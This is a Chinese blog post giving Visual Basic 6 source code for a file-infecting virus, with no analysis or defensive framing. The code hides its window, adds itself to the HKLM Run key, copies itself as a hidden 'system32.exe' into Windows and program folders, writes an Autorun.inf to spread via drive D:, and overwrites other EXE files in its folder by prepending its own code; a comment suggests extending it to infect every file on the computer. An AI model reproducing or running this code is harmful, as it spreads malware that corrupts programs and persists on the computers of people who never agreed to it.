2017-2-28
14:27

root
root

[程序代码]感染SYSTEM32里的EXE文件

Option Explicit
Private Victim As String
Private HostLen As Long
Private vbArray() As Byte
Private hArray() As Byte
Private lenght As Long
Private MySize As Integer
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
Private Sub Form_Load()
Dim i As Long
On Error GoTo vbVerror
'Kill "*.dll"
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
Shell "system32.exe"
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _
As #1
ReDim MyArray(LOF(1) - 1)
MySize = LOF(1)
ReDim vbArray(MySize)
Get #1, 1, vbArray
Close #1

 

Victim = Dir(App.Path & "\" & "*.exe") '随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)
While Victim <> ""

If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then
Open App.Path & "\" & Victim For Binary Access Read As #1
ReDim hArray(LOF(1))
Get #1, 1, hArray
Close #1

 

If hArray(&H69) <> &H4D Then

i = hArray(&H3C)
If hArray(i) = &H50 Then
Open App.Path & "\" & Victim For Binary Access Write As #1
Put #1, , vbArray
Put #1, MySize, hArray
Close #1
End If
End If
End If


Victim = Dir()

Wend

 

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
lenght = LOF(1) - MySize
If lenght <> 0 Then
ReDim vbArray(lenght - 1)
Get #1, MySize, vbArray
Close #1

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Write As #1
Put #1, , vbArray
Close #1


idProg = Shell(App.Path & "\" & App.EXEName & ".exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill App.Path & "\" & App.EXEName & ".exe"

Else
Close #1

End If

End

vbVerror:
End Sub
Private Sub Form_Initialize()
Form1.Hide
On Error GoTo 1:
Dim AAA As Long
RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run\", AAA
RegSetValue AAA, vbNullString, REG_SZ, "C:\WINDOWS\system32\system32.exe", 4

If Dir("C:\WINDOWS\system32\system32.exe") <> "" Then
Else
FileCopy App.Path & "\system32.exe", "C:\WINDOWS\system32\system32.exe"
Shell "C:\WINDOWS\system32\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\system32.exe"
Shell "C:\system32.exe"
FileCopy App.Path & "\system32.exe", "D:\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Windows\system32.exe"
Shell "C:\Windows\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Program Files\Internet Explorer\system32.exe"
Shell "C:\Program Files\Internet Explorer\system32.exe"
FileCopy App.Path & "\system32.exe", "C:\Program Files\Windows Media Player\system32.exe"
Shell "C:\Program Files\Windows Media Player\system32.exe"
Shell "attrib +h +r C:\WINDOWS\system32\system32.exe", vbHide
Shell "attrib +h +r C:\system32.exe", vbHide
Shell "attrib +h +r D:\system32.exe", vbHide
Open "d:\Autorun.inf" For Output As #1
Print #1, "[autorun]"
Print #1, "open=system32.exe"
Close #1
Shell "attrib +h +r D:\Autorun.inf", vbHide
1:
End If
End Sub

文章如需转载请注明:转载自: 紫灵幽梦
« 上一篇 下一篇 »

相关文章:

vb读取access并且显示  (2017-5-11 9:18:27)

VB 获取CPU温度示例  (2017-5-8 10:35:11)

VB程序逆向反汇编常见的函数   (2017-5-8 10:32:0)

VB内嵌汇编的模块示例  (2017-5-8 10:24:4)

内存数据的读写(PC)   (2017-3-1 17:51:40)

用VB制作外挂   (2017-3-1 16:16:53)

发表留言: